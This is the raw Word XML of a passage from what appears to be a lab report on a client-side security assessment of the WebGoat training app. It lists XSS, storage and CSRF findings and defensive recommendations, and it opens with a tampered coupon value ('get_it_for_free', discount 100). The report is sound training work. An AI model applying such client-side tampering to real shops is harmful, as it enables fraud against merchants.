    <w:p w14:paraId="598966B9" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0736A133" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">      "code": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>get_it_for_free</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D2DAC6" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">      "discount": 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151FAF14" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8C613D" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE3926C" w14:textId="537B4C3B" w:rsidR="00D43578" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE78EC4" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00E85A2B" w:rsidRDefault="00700EFC" w:rsidP="00E85A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85A2B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Documented key steps and findings with screenshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB4742A" w14:textId="77777777" w:rsidR="008B2356" w:rsidRDefault="008B2356" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="515CE944" w14:textId="432482A3" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Results and Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746DBD67" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3108013E" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="008B2356" w:rsidRDefault="00700EFC" w:rsidP="008B2356">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B2356">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Client-Side Vulnerabilities Identified:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2485DC" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00E85A2B" w:rsidRDefault="00700EFC" w:rsidP="00E85A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85A2B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Discovered potential XSS vulnerabilities, indicating inadequate input validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633016B2" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00E85A2B" w:rsidRDefault="00700EFC" w:rsidP="00E85A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85A2B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Examined client-side storage mechanisms for potential weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E39955" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00E85A2B" w:rsidRDefault="00700EFC" w:rsidP="00E85A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85A2B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Assessed the application's resistance to CSRF attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E3696" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="008B2356" w:rsidRDefault="00700EFC" w:rsidP="008B2356">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B2356">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Unauthorized Access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1900D0C4" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="008B2356" w:rsidRDefault="00700EFC" w:rsidP="008B2356">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B2356">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Demonstrated the impact of successful XSS attacks, highlighting the risk of unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F55B27D" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="008B2356" w:rsidRDefault="00700EFC" w:rsidP="008B2356">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B2356">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Unexpected Outcomes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AD4399" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="008B2356" w:rsidRDefault="00700EFC" w:rsidP="008B2356">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B2356">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Illustrated the importance of implementing secure client-side practices to prevent common vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C40C005" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="008B2356">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0307046D" w14:textId="44DAE2EF" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Analysis and Conclusions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4173C8" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D03A39D" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The client-side security assessment emphasizes the need for robust security measures to protect against common client-side attacks. Addressing vulnerabilities such as XSS and CSRF is crucial to ensuring the integrity and security of client-side interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA8945B" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21502421" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A86BAE4" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DBC7972" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Implement thorough input validation and sanitization to prevent XSS vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028BE23C" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Utilize secure client-side storage practices, and regularly audit and update cookie settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B72C6C7" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Employ anti-CSRF tokens to mitigate the risk of Cross-Site Request Forgery attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4095DE" w14:textId="2AEC512A" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Implement and enforce Content Security Policy (CSP) headers to restrict the execution of scripts from unauthorized sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C21A67" w14:textId="4B74B70B" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Reflection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7B901A" w14:textId="484BEA36" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3553EF25" w14:textId="181FE30D" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The assessment provided valuable insights into potential client-side vulnerabilities in WebGoat. Future evaluations should continue to focus on enhancing client-side security measures to create a more resilient application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700A23AC" w14:textId="18A1E59D" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50077764" w14:textId="00F982F1" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="005B45BD" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="659A8224" wp14:editId="05DC9802">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2785478</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>6683208</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1201420" cy="901065"/>
            <wp:effectExtent l="0" t="0" r="5080" b="635"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="2129015970" name="Picture 11" descr="A computer screen with a white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15970" name="Picture 11" descr="A computer screen with a white text on i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01420" cy="901065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00700EFC" w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497C258C" w14:textId="297882A8" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="005B45BD" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1599F6B9" wp14:editId="27A3A798">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1720282</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>6766092</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="968375" cy="726440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="827443222" name="Picture 6" descr="A computer screen with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43222" name="Picture 6" descr="A computer screen with a white box&#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68375" cy="726440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="149DD1AE" wp14:editId="15F48528">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-294840</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>6808470</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1033145" cy="774700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="131594346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43461" name="Picture 1" descr="A computer screen with white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33145" cy="774700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C517BD" w14:textId="03949A37" w:rsidR="00700EFC" w:rsidRPr="00EC0C03" w:rsidRDefault="005B45BD" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43763765" wp14:editId="09C70506">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4162425</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>8054908</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="893445" cy="669925"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1017389245" name="Picture 7" descr="A computer screen with a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89245" name="Picture 7" descr="A computer screen with a white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93445" cy="66992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77696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="098C4CD2" wp14:editId="596C83CD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2899543</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>7964003</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1083945" cy="812800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="354150373" name="Picture 10" descr="A computer screen with a menu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50373" name="Picture 10" descr="A computer screen with a menu on i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83945" cy="812800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="70FEC5D6" wp14:editId="12291ED6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1929664</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>8056947</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="852805" cy="639445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="987242488" name="Picture 8" descr="A computer screen with a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42488" name="Picture 8" descr="A computer screen with a white tex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rot="10800000" flipH="1">
                      <a:off x="0" y="0"/>
                      <a:ext cx="852805" cy="63944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70528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76EDF597" wp14:editId="07DED09A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>799599</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>6912643</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="772795" cy="579755"/>
            <wp:effectExtent l="0" t="0" r="1905" b="4445"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1505315593" name="Picture 2" descr="A computer screen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15593" name="Picture 2" descr="A computer screen with a white screen&#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72795" cy="579755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00441969">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="46EB8AAA" wp14:editId="47606AB9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>737709</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>8053297</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1038225" cy="778510"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1872431138" name="Picture 9" descr="A computer screen with a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31138" name="Picture 9" descr="A computer screen with a white tex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rot="10800000" flipH="1">
                      <a:off x="0" y="0"/>
                      <a:ext cx="1038225" cy="778510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00441969">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="25F405D6" wp14:editId="7F0B34EC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-310818</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>8045346</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1050290" cy="788035"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1534820075" name="Picture 5"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20075" name="Picture 5" descr="A computer screen with text on i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50290" cy="788035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00700EFC" w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00700EFC" w:rsidRPr="00EC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0CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EEF25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23702"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="00C4B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B6EC2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="92766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511F0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="98FA3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63F89"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3732C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30F90"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8A18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63DAA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E1A07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EA29CD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="97367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CB716D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F86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51DC8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9704E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96990"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25B26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DA4085"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D17AB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96DD7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3422730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0E0D09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77CA1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B57EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18026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A35B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4FF83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115794"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3528A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7F7282"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8F90E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861FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="980A2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162647">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2121072835">
    <w:abstractNumId w:val="7"/>
    <w:lvlOverride w:ilvl="1">
      <w:lvl w:ilvl="1">
        <w:numFmt w:val="bullet"/>
        <w:lvlText w:val=""/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:tabs>
            <w:tab w:val="num" w:pos="1440"/>
          </w:tabs>
